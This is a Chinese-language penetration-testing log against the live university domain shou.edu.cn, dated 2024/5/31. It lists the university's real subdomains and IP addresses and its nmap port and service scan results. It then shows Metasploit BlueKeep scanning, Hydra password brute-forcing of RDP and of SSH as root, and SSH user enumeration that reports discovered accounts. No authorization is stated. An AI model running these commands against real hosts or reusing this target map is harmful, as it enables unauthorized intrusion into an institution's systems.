渗透测试1
date: 2024/5/31
target:shou.edu.cn
ping请求超时,网页能正常打开,服务器可能配置了防火墙规则,阻止了 ICMP
WHOIS 查询结果(whois.domaintools.com)
- 域名使用的名称服务器是
DNS1.SHOU.EDU.CN和SDNS.SHOU.EDU.CN。 - 域名的 IP 地址是
202.121.64.9,这个地址位于中国上海,归属于中国教育和科研计算机网(CERNET)。 - ASN 号码为
AS4538 ERX-CERNET-BKB,这是 CERNET 的一个网络标识。
theHarvester -d shou.edu.cn -b baidu 获取相关信息
admissions.shou.edu.cn
cjxy.shou.edu.cn:202.121.64.50
cwc.shou.edu.cn:202.121.64.50
cxw.shou.edu.cn:202.121.64.50
dag.shou.edu.cn:202.121.64.50
ecampus.shou.edu.cn:202.121.66.152
eclass.shou.edu.cn:202.121.64.96
edf.shou.edu.cn:202.121.64.50
gcxy.shou.edu.cn:202.121.64.50
gcxy.shou.edu.cn
hadal.shou.edu.cn:202.121.64.50
hdkjy.shou.edu.cn
hdkjy.shou.edu.cn:202.121.64.50
hyxy.shou.edu.cn
hyxy.shou.edu.cn:202.121.64.50
ieo.shou.edu.cn:202.121.64.50
jcxt.shou.edu.cn:202.121.66.27
jgzj.shou.edu.cn:202.121.64.50
jgzj.shou.edu.cn
jmxy.shou.edu.cn:202.121.64.50
jmxy.shou.edu.cn
jwc.shou.edu.cn
jwzx.shou.edu.cn
kjqk.shou.edu.cn:202.121.64.50
library.shou.edu.cn:124.243.227.8, 140.210.88.45, 140.210.88.44, 124.243.227.9
lseofr.shou.edu.cn:202.121.64.50
lseofr.shou.edu.cn
rczp.shou.edu.cn:202.121.66.175
rsrc.shou.edu.cn:202.121.64.50
rsrc.shou.edu.cn
smxy.shou.edu.cn:202.121.64.50
spxy.shou.edu.cn:202.121.64.50
spxy.shou.edu.cn
st.shou.edu.cn:202.121.64.7
sthj.shou.edu.cn:202.121.64.50
tech.shou.edu.cn:202.121.64.50
tyb.shou.edu.cn:202.121.64.50
tyb.shou.edu.cn
uis.shou.edu.cn
urp.shou.edu.cn:202.121.66.188
wfxy.shou.edu.cn:202.121.64.50
www.shou.edu.cn:202.121.64.9
wyxy.shou.edu.cn
wyxy.shou.edu.cn:202.121.64.50
xjzx.shou.edu.cn
xszx.shou.edu.cn:202.121.64.50
xxgk.shou.edu.cn
xxgk.shou.edu.cn:202.121.64.50
yjs.shou.edu.cn:202.121.64.50
yjs.shou.edu.cn
yywz.shou.edu.cn:202.121.64.50
yz.shou.edu.cn:202.121.64.53
zcgs.shou.edu.cn
zsjy.shou.edu.cn:202.121.64.50
zzb.shou.edu.cn:202.121.64.50
ip提取
202.121.64.50
202.121.66.152
202.121.64.96
202.121.66.27
202.121.64.7
202.121.66.175
202.121.66.188
202.121.64.9
124.243.227.8
140.210.88.45
140.210.88.44
124.243.227.9
202.121.64.53
端口扫描
nmap -iL ips.txt -sT -p 1-1000 -oN tcp_scan_results.txtnmap -iL ips.txt -sU -p 1-1000 -oN udp_scan_results.txtnmap -iL ips.txt -sT -p- -T4 --disable-arp-ping -oN tcp_scan_results.txtnmap -iL ips.txt -sU -p- -T4 --disable-arp-ping -oN udp_scan_results.txt
为了快,我们使用:nmap -iL targetip -sT -p 1-1000 -T4 --disable-arp-ping -oN tcp_scan_results.txt
nmap -iL targetip -p 1-1000 -sV -oN scan_results.txtnmap -iL targetip -sT -p- -oN tcp_scan_results.txt # 扫描所有IP的TCP端口nmap -iL targetip -sU -p- -oN udp_scan_results.txt# 扫描所有IP的UDP端口
太慢了,没跑
Nmap scan report for 202.121.66.27
Host is up (0.089s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
443/tcp open ssl/https?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for imap.shou.edu.cn (202.121.64.7)
Host is up (0.097s latency).
Not shown: 990 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
25/tcp open smtp?
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open ssl/https cmproxy
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap
995/tcp open ssl/pop3?
Nmap scan report for 202.121.66.175
Host is up (0.080s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh WeOnlyDo sshd 2.4.3 (protocol 2.0)
80/tcp open tcpwrapped
443/tcp open ssl/https
Nmap scan report for meet.shou.edu.cn (202.121.64.9)
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/http Apache httpd
Nmap scan report for 124.243.227.8
Host is up (0.050s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
Nmap scan report for 140.210.88.45
Host is up (0.42s latency).
Not shown: 995 filtered tcp ports (no-response), 3 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
Nmap scan report for 140.210.88.44
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
Nmap scan report for 124.243.227.9
Host is up (0.076s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https?
Nmap scan report for yz.shou.edu.cn (202.121.64.53)
Host is up (1.3s latency).
Not shown: 739 filtered tcp ports (no-response), 258 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http?
443/tcp closed https
3389(端口关闭)
202.121.66.27
Metasploit检测BlueKeep漏洞的模块
msfconsole//启动
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep //加载BlueKeep检测模块
set RHOSTS 202.121.66.27 //设置主机
run//启动
失败
使用Nmap的NSE脚本进行BlueKeep漏洞检测:nmap -p 3389 --script rdp-vuln-ms12-020 202.121.66.27这里使用的rdp-vuln-ms12-020是用于检测另一个RDP漏洞的脚本。BlueKeep的检测需要一个特定的脚本或工具。
失败
爆破:hydra -t 1 -V -f -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt rdp://202.121.66.27
爆破rdp端口失败
22
202.121.66.175
22/tcp open ssh WeOnlyDo sshd 2.4.3 (protocol 2.0)
202.121.64.53
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
- 检查shh版本漏洞:nmap -p 22 -sV --script=ssh2-enum-algos,ssh-hostkey,sshv1 202.121.64.53
- 爆破:hydra -l root -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ssh://202.121.64.53
msfconsole
search ssh
use auxiliary/scanner/ssh/ssh_enumusers
set rhosts 202.121.64.53
set user_file /path/to/username.txt
run
结果:
[+] 202.121.64.53:22 - SSH - User 'adm' found
[!] No active DB -- Credential data will not be saved!
[+] 202.121.64.53:22 - SSH - User 'mysql' found
常见操作系统的默认 TTL 值:
- Windows:128
- Linux/Unix:64
- Cisco:255
202.121.64.53:linux
目标设备类型为 WAP(Wireless Access Point),即无线接入点。
目标设备运行嵌入式 Linux 操作系统,具体型号为 Actiontec MI424WR-GEN3I。
cpe:/h:actiontec:硬件 CPE(Common Platform Enumeration)表示目标设备是 Actiontec MI424WR-GEN3I。
cpe:/o:linux:操作系统 CPE 表示目标设备运行 Linux 内核。
202.121.66.27:windows
80
202.121.64.53:yz.shou.edu.cn 域名能在浏览器访问,会重向到页面:http://yz.shou.edu.cn/login.jsp, ip不能访问
nmap -p 80 --script http-enum -d 202.121.64.53 #返回信息来看被从定向了,不能正常扫描
curl -v -L -H "Host: yz.shou.edu.cn" http://202.121.64.53 c